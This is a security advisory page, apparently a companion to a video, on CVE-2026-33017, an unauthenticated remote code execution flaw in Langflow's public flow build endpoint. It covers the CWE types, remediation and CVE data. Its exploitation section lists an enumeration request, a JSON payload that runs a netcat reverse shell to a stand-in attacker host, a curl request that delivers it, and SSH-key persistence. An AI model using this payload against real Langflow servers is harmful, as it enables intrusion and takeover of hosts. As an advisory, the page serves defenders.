Langflow <1.9.0: unauthenticated remote code execution via public flow build endpoint in Langflow (CVE-2026-33017) #shorts

Summary

In today’s episode we cover CVE-2026-33017, a critical unauthenticated remote code execution vulnerability in Langflow-ai’s Langflow tool. Disclosed on March 20, 2026, and patched hours later in version 1.9.0, this flaw was exploited within 20 hours of publication, highlighting the speed at which attackers can weaponize code injection bugs in AI workflow platforms.

Product details

Langflow is an open-source tool that lets developers design, build, and deploy AI-powered agents and workflows via a web interface and REST API. It’s hosted on GitHub under the langflow-ai organization, and prior to version 1.9.0 the project supported public and private flows with a build endpoint that inadvertently allowed unauthenticated access to code execution.

Vulnerability type summary

This issue combines three CWE categories: CWE-94 Improper Control of Generation of Code (Code Injection), CWE-95 Improper Neutralization of Directives in Dynamically Evaluated Code (Eval Injection), and CWE-306 Missing Authentication for Critical Function. The root cause is allowing attacker-supplied flow definitions to be passed unchecked to Python’s exec() function without sandboxing or authentication.

Details of the vulnerability

The vulnerable endpoint is POST /api/v1/build_public_tmp/{flow_id}/flow. Although designed to let unauthenticated users build publicly shared flows, the implementation accepted an optional data payload. If that payload contained node definitions with arbitrary Python code, the server would call exec() on it with zero isolation. An attacker could craft a malicious flow_id and data JSON to execute system commands, escalate privileges, or drop backdoors on the host. This contrasts with CVE-2025-3248, which secured the /validate/code endpoint; here the mistake was treating build_public_tmp as safe for unauthenticated use. The fix in 1.9.0 enforces using stored flow data or requires explicit confirmation and sanitization of any dynamic input.

Conclusion

CVE-2026-33017 underscores the importance of authentication and sandboxing when evaluating user-supplied code. Users of Langflow-ai should upgrade immediately to version 1.9.0 or later. Security teams building AI platforms must review code execution paths, apply the principle of least privilege, and avoid blind use of exec-style functions. That wraps up our deep dive into this high-risk vulnerability—stay safe and keep your dependencies up to date.

Watch the full video on YouTube: CVE-2026-33017

Remediation and exploitation details

This chain involves the following actors

  • Unauthenticated Attacker: Remote actor exploiting the public flow build endpoint without credentials
  • System Administrator: Responsible for deploying, configuring, and updating Langflow instances

This following systems are involved

  • Langflow Server (Hosts AI workflow definitions and executes flow builds): Target service running vulnerable code
  • Build Public Flow Endpoint (Allows public flow compilation without authentication): Attack surface that processes attacker-supplied flow data

Attack entry point

  • POST /api/v1/build_public_tmp/{flow_id}/flow: Public endpoint intended for building shared flows, but accepts an optional data parameter and passes node definitions directly to exec() without sandboxing or authentication

Remediation actions

System Administrator
Upgrade Langflow to version 1.9.0 or later
Langflow Server
Developer
Require authentication on the build_public_tmp endpoint and sanitize or remove exec() on untrusted data
Build Public Flow Endpoint
DevOps Engineer
Restrict access to public endpoints via network controls and firewall rules
Langflow Server

Exploitation actions

Enumeration

Unauthenticated Attacker
Discover a valid public flow identifier
Langflow Server
Examples:
  • GET https://langflow.example.com/api/v1/flows to list public flows and pick a flow_id

Payload crafting

Unauthenticated Attacker
Construct malicious flow payload containing arbitrary Python code in a node definition
Build Public Flow Endpoint
Examples:
  • {"data": {"nodes": {"1": {"type": "code", "code": "import os; os.system('nc attacker.com 4444 -e /bin/sh')"}}}}

Remote code execution

Unauthenticated Attacker
Send HTTP POST request to the build endpoint with the malicious payload
Build Public Flow Endpoint
Examples:
  • curl -X POST https://langflow.example.com/api/v1/build_public_tmp/1234/flow -H "Content-Type: application/json" -d '{"data":{...}}'

Arbitrary code execution

Unauthenticated Attacker
Server invokes exec() on attacker-supplied code, executing it on the host
Langflow Server
Examples:
  • Python exec() runs os.system('nc attacker.com 4444 -e /bin/sh') establishing a reverse shell

Post-exploitation

Unauthenticated Attacker
Deploy persistence mechanisms or escalate privileges on the compromised host
Langflow Server
Examples:
  • Add SSH public key to ~/.ssh/authorized_keys or install a backdoor service

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2026-33017
Description
Langflow is a tool for building and deploying AI-powered agents and workflows. In versions prior to 1.9.0, the POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution. This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code. This issue has been fixed in version 1.9.0.
Provider
GitHub_M
CWE / problem types
CWE-94: Improper Control of Generation of Code ('Code Injection'),CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection'),CWE-306: Missing Authentication for Critical Function
Affected Software Versions
langflow-ai:langflow:[{'version': '< 1.9.0', 'status': 'affected'}]
Date Published
2026-03-20T04:52:52.885Z
Last Updated
2026-03-20T18:41:53.573Z